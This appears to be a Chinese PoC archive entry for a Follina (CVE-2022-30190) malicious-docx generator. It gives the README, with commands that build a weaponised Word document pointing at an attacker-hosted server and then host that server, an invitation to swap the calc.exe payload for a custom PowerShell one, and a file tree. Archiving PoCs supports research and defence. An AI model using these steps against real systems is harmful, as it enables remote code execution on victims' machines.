关联漏洞
描述
MS-MSDT Follina CVE-2022-30190 PoC document generator
介绍
# MS-MSDT Follina CVE-2022-30190 PoC
Malicious docx generator to exploit (Microsoft Office Word Remote Code Execution)
Creation of this Script is based on [CVE-2021-40444 PoC by LockedByte](https://github.com/lockedbyte/CVE-2021-40444) and [writeup by Tothi](https://gist.github.com/tothi/66290a42896a97920055e50128c9f040)
# Using
First modify backup.html and replace powershell payload. Right now just pops a `calc.exe` using `IEX('calc.exe')`.
`python3 exploit.py generate http://<SRV IP>`
Once you generate the malicious docx (will be at `out/`) you can setup the server:
`sudo python3 exploit.py host 80`
Finally try the docx in a Windows Virtual Machine:
文件快照
[4.0K] /data/pocs/1e962f54cc69df09afe70623fec7259d5041fda3
├── [4.0K] data
│ └── [4.0K] word_dat
│ ├── [1.4K] [Content_Types].xml
│ ├── [4.0K] docProps
│ │ ├── [ 733] app.xml
│ │ └── [ 745] core.xml
│ ├── [4.0K] _rels
│ └── [4.0K] word
│ ├── [ 14K] document.xml
│ ├── [2.3K] fontTable.xml
│ ├── [4.0K] _rels
│ │ └── [1.2K] document.xml.rels
│ ├── [2.6K] settings.xml
│ ├── [ 32K] styles.xml
│ ├── [4.0K] theme
│ │ └── [6.9K] theme1.xml
│ └── [ 603] webSettings.xml
├── [2.2K] exploit.py
├── [4.0K] img
│ ├── [ 46K] calc.png
│ ├── [ 82K] gen.png
│ └── [186K] srv.png
├── [4.0K] out
│ └── [ 1] 0-blank
├── [ 763] README.md
└── [4.0K] srv
├── [4.5K] backup.html
└── [ 11K] index.html
10 directories, 18 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。